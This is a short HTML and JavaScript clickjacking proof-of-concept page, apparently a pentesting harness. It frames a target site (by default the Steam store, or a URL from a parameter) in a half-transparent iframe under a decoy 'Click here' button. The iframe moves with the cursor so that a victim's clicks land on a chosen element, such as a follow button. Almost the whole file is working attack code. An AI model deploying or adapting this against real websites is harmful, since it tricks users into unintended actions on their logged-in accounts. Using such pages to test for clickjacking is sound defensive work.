<html>
<head>
<title>Clickjack poc</title>
<script type="text/javascript" src="../utils.js"></script>
<script type="text/javascript" src="../jq.js"></script>
///clickjacking/click.html?selector=a&x=20&y=75
//an atempt at mousemove approach
        <style type="text/css"><!--
            *{
                margin:0;
                padding:0;
            }
            body {  
                background:#ffffff;
            }
            
            .button
            {
                padding:5px;
                background:#6699CC;
                left:275px;
                width:120px;
                border: 1px solid #336699;
            }
            #overlay {
            	width: 100%;
            	height: 100%;
            	filter: alpha(opacity=0.5);
                opacity:0.5
            }
            #content {
                width: 500px;
                height: 500px;
                margin-top: 150px ;
                margin-left: 500px;
            }
            #clickjacking
            {
                position: absolute;
                left: 172px;
                top: 60px;
                filter: alpha(opacity=0.5);
                opacity:0.5
            }
        //--></style>
<script>
const url= getAllUrlParams().url|| 'http://exploit.germanywestcentral.cloudapp.azure.com'
const selector= getAllUrlParams().selector|| '#follow'
const xoffset= parseInt(getAllUrlParams().x)|| 50
const yoffset= parseInt(getAllUrlParams().y)|| 50
const buttonX = parseInt(getAllUrlParams().buttonX)|| 50
const buttonY = parseInt(getAllUrlParams().buttonY)|| 50

	</script>
</head>
<body>
	<div id="overlay">
<p>Website is vulnerable to clickjacking!</p>
        <div id="content">
            <h1>Click here</h1>
            <form action="http://www.owasp.com">
                <input type="submit" class="button" value="click">
            </form>
        </div>

<iframe id="clickjacking" src="https://store.steampowered.com/" scrolling="no" frameborder="none" width="500" height="500"></iframe>
	</div>
<script>

// A $( document ).ready() block.
$( document ).ready(function() {
	document.getElementsByTagName('iframe')[0].setAttribute('src',url);

	//TODO:an attempt to dynamically set the offset
	//element = $("#clickjacking").contents().find("a").offset().top;
	//console.log( $('a', $(document.getElementsByTagName('iframe')[0].document).contents()).offset() )
	//console.log(element)

	//JQ implementation
	//$(document).mousemove(function(e) {
  //$("iframe").css({
  //  left: e.pageX -xoffset,
  //  top: e.pageY - yoffset
  //});
//});
});
  let target = document.getElementsByTagName('iframe')[0];

const onMouseMove = (e) =>{
  target.style.left = e.clientX -xoffset + 'px';
  target.style.top = e.clientY -yoffset + 'px';
}
document.querySelector('#overlay').addEventListener('mouseover', onMouseMove);
</script>
</body>
</html>